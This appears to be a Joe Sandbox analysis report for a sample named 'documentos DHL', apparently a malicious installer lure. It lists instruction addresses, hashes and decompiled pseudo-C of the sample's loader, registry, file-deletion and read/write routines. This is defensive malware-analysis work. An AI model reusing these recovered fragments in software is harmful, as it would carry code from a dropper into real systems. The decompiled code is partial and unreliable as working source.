0x00406f04
0x00406f07
0x00406f15
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071ee
0x004071f5
0x00000000
0x00000000
0x004071fa
0x004071fa
0x004071fe
0x00407336
0x00000000
0x00407336
0x00407204
0x00407207
0x0040720a
0x0040720e
0x00407211
0x00407217
0x00407219
0x00407219
0x00407219
0x0040721c
0x0040721f
0x0040721f
0x0040721f
0x0040721f
0x00407222
0x00407222
0x00407226
0x00407286
0x00407289
0x0040728e
0x0040728f
0x00407291
0x00407293
0x00407296
0x004071a2
0x004071a2
0x00000000
0x004071a8
0x004071a2
0x00407228
0x0040722e
0x00407231
0x00407234
0x00407237
0x0040723a
0x0040723d
0x00407240
0x00407243
0x00407246
0x00407249
0x00407262
0x00407265
0x00407268
0x0040726b
0x0040726f
0x00407271
0x00407271
0x00407272
0x00407275
0x0040724b
0x0040724b
0x00407253
0x00407258
0x0040725a
0x0040725d
0x0040725d
0x00407278
0x0040727f
0x00000000
0x00407281
0x00000000
0x00407281
0x00000000
0x00406f1d
0x00406f20
0x00406f56
0x00407086
0x00407086
0x00407086
0x00407086
0x00407089
0x00407089
0x0040708c
0x0040708e
0x00407318
0x00000000
0x00407318
0x00407094
0x00407097
0x00000000
0x00000000
0x0040709d
0x004070a1
0x004070a4
0x004070a4
0x004070a4
0x00000000
0x004070a4
0x00406f22
0x00406f24
0x00406f26
0x00406f28
0x00406f2b
0x00406f2c
0x00406f2e
0x00406f30
0x00406f33
0x00406f36
0x00406f4c
0x00406f51
0x00406f89
0x00406f89
0x00406f8d
0x00406fb9
0x00406fbb
0x00406fc2
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fcd
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd9
0x00406fdc
0x00407009
0x00407009
0x0040700c
0x0040700f
0x00407083
0x00407083
0x00407083
0x00000000
0x00407083
0x00407011
0x00407017
0x0040701a
0x0040701d
0x00407020
0x00407023
0x00407026
0x00407029
0x0040702c
0x0040702f
0x00407032
0x0040704b
0x0040704d
0x00407050
0x00407051
0x00407054
0x00407056
0x00407059
0x0040705b
0x0040705d
0x00407060
0x00407062
0x00407065
0x00407069
0x0040706b
0x0040706b
0x0040706c
0x0040706f
0x00407072
0x00407034
0x00407034
0x0040703c
0x00407041
0x00407043
0x00407046
0x00407046
0x00407075
0x0040707c
0x00407006
0x00407006
0x00407006
0x00407006
0x00000000
0x0040707e
0x00000000
0x0040707e
0x0040707c
0x00406f8f
0x00406f92
0x00406f94
0x00406f97
0x00406f9a
0x00406f9d
0x00406f9f
0x00406fa2
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fa8
0x00406fab
0x00406fb2
0x00406f86
0x00406f86
0x00406f86
0x00406f86
0x00000000
0x00406fb4
0x00000000
0x00406fb4
0x00406fb2
0x00406f38
0x00406f3b
0x00406f3d
0x00406f40
0x00000000
0x00000000
0x00406c9f
0x00406c9f
0x00406ca3
0x004072e8
0x00000000
0x004072e8
0x00406ca9
0x00406cac
0x00406caf
0x00406cb2
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbd
0x00406cc0
0x00406cc3
0x00406cc6
0x00406cc8
0x00406cc8
0x00406cc8
0x00000000
0x00000000
0x00406e2a
0x00406e2a
0x00406e2e
0x004072f4
0x00000000
0x004072f4
0x00406e34
0x00406e37
0x00406e3a
0x00406e3d
0x00406e3f
0x00406e3f
0x00406e3f
0x00406e42
0x00406e45
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e52
0x00406e54
0x00406e54
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e60
0x00406e60
0x00406e63
0x00406e65
0x00406e65
0x00000000
0x00000000
0x004070a7
0x004070a7
0x004070a7
0x004070ab
0x00000000
0x00000000
0x004070b1
0x004070b4
0x004070b7
0x004070ba
0x004070bc
0x004070bc
0x004070bc
0x004070bf
0x004070c2
0x004070c5
0x004070c8
0x004070cb
0x004070ce
0x004070cf
0x004070d1
0x004070d1
0x004070d1
0x004070d4
0x004070d7
0x004070da
0x004070dd
0x004070e0
0x004070e4
0x004070e6
0x004070e9
0x00000000
0x004070eb
0x00406e68
0x00406e68
0x00000000
0x00406e68
0x004070e9
0x0040731e
0x00000000
0x00000000
0x0040694d
0x00407355
0x00407355
0x00000000
0x00407355
0x004071a2
0x00407129
0x00407126

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a318");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E004067F9( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E00405414(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cddc, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403A5E( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040202c
0x0040202c
0x00402031
0x00402038
0x004020f7
0x00402245
0x00402245
0x00402abf
0x00402ac2
0x00402ace
0x00402ace
0x00402047
0x00402051
0x00402054
0x00402064
0x00402068
0x00402070
0x00402073
0x004020f0
0x00000000
0x004020f0
0x00402075
0x00402080
0x00402084
0x004020c4
0x00402086
0x00402089
0x0040208c
0x004020b8
0x0040208e
0x00402091
0x0040209a
0x0040209c
0x0040209c
0x0040209a
0x0040208c
0x004020cc
0x004020e5
0x004020e5
0x00000000
0x004020cc
0x00402057
0x0040205f
0x00402062
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057

Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
Instruction ID: efb744b1bbbaa1f1e58e2693dd3ff93cd36a27706c6aad24c330354b17a2434d
Opcode Fuzzy Hash: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
Instruction Fuzzy Hash: 6F21C531900218EBCF20AFA5CE4CA9E7A70AF04354F60413BF610B61E1DBBD4991DA6E

Uniqueness

Uniqueness Score: -1.00%

Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff); // executed
					}
					_t24[0x3ff] = _t16;
					_push(_t22);
					RegCloseKey();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x004024f2
0x004024f2
0x004024f2
0x004024f7
0x004024fe
0x00402500
0x00402508
0x0040250b
0x0040250e
0x00402885
0x00402514
0x0040251c
0x0040251f
0x00402538
0x0040253e
0x00402540
0x00402542
0x00402542
0x00402521
0x00402525
0x00402525
0x00402549
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: b0729b349306081e7aa4f6425ee6758a54f4ef338444a77128fae8a6ad8b3861
Instruction ID: 4fa2f3c06f6248971957712acf2942ced6ba336c37b2851dfbda8b2cd28c17b0
Opcode Fuzzy Hash: b0729b349306081e7aa4f6425ee6758a54f4ef338444a77128fae8a6ad8b3861
Instruction Fuzzy Hash: 6D017171904104EFE7159FA5DE89ABFB6B8EF44348F10403EF105A62D0DAB84E459B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405A76 Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00405A76(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00405E7D(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW(); // executed
				} else {
					_t9 = RemoveDirectoryW();
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}

0x00405a77
0x00405a82
0x00405a87
0x00405ab7
0x00000000
0x00405ab7
0x00405a8e
0x00405a8f
0x00405a99
0x00405a91
0x00405a91
0x00405a91
0x00405aa1
0x00405aad
0x00405ab1
0x00405ab1
0x00000000
0x00405aa3
0x00000000
0x00405aa5

APIs

Part of subcall function 00405E7D: GetFileAttributesW.KERNELBASE(?,?,00405A82,?,?,00000000,00405C58,?,?,?,?), ref: 00405E82
Part of subcall function 00405E7D: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405E96

RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405C58), ref: 00405A91
DeleteFileW.KERNELBASE(?,?,?,00000000,00405C58), ref: 00405A99
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405AB1

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: ee26814d0e89ccba1e58ecbc8b5a308cd0754c8ce938ef3c5221310ac7d33209
Instruction ID: 9bd11d9b4c650e18391102d9085bfebd18f0a245932bc49a9059f5fcfa567b04
Opcode Fuzzy Hash: ee26814d0e89ccba1e58ecbc8b5a308cd0754c8ce938ef3c5221310ac7d33209
Instruction Fuzzy Hash: 19E0E531305AA11AD25057749E48A9F2998DFD6314F060B3AF9A1F10D0C77849068EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405F54 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F54(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405f58
0x00405f68
0x00405f70
0x00000000
0x00405f77
0x00000000
0x00405f79

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00410E92,FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6,004033C2,FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6,00410E92,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68

Strings

FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6, xrefs: 00405F54

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: FileWrite
String ID: FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6
API String ID: 3934441357-964589852
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F25 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F25(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405f29
0x00405f39
0x00405f41
0x00000000
0x00405f48
0x00000000
0x00405f4a

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39

Strings

FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6, xrefs: 00405F25

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: FileRead
String ID: FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6
API String ID: 2738559852-964589852
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8

Uniqueness

Uniqueness Score: -1.00%

Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E1000289C(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				long _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004050 != 0 && E1000281E(_a4) == 0) {
					 *0x10004054 = _t106;
					if( *0x1000404c != 0) {
						_t106 =  *0x1000404c;
					} else {
						E10002DE0(E10002818(), __ecx);
						 *0x1000404c = _t106;
					}
				}
				_t31 = E1000285A(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E1000284E();
					_t81 = _a4;
					_t90 =  *0x10004058;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004058 = _t81;
					E10002848();
					_t36 = SetFilePointer(??, ??, ??, ??); // executed
					 *0x10004034 = _t36;
					 *0x10004038 = _t90;
					if( *0x10004050 != 0 && E1000281E( *0x10004058) == 0) {
						 *0x1000404c = _t107;
						_t107 =  *0x10004054;
					}
					_t91 =  *0x10004058;
					_a4 = _t91;
					 *0x10004058 =  *((intOrPtr*)(E1000284E() + _t91));
					_t40 = E1000282C(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E1000285A(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E10002865() + _a4 + _v8);
							_push(E1000286F());
							if( *0x10004050 <= 0 || E1000281E(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004058 == 0) {
						 *0x1000404c = 0;
					}
					_t94 = _a4 + E10002865();
					 *(E10002873() + _t94) =  *0x10004034;
					 *((intOrPtr*)(E10002877() + _t94)) =  *0x10004038;
					E10002887(_a4);
					if(E1000283A() != 0) {
						 *0x10004068 = GetLastError();
					}
					return _a4;
				}
				_push(E10002865() + _a4);
				_t65 = E1000286B();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E10002877();
				_t100 = E10002873();
				_t103 = E1000286F();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x100028ac
0x100028bd
0x100028ca
0x100028de
0x100028cc
0x100028d1
0x100028d6
0x100028d6
0x100028ca
0x100028e7
0x100028ec
0x100028f2
0x10002936
0x10002936
0x1000293b
0x10002940
0x10002946
0x10002948
0x1000294e
0x1000295b
0x1000295d
0x10002962
0x1000296f
0x10002982
0x10002988
0x1000298e
0x1000298f
0x10002995
0x100029a1
0x100029a7
0x100029af
0x100029b0
0x100029b3
0x100029be
0x100029c0
0x100029cc
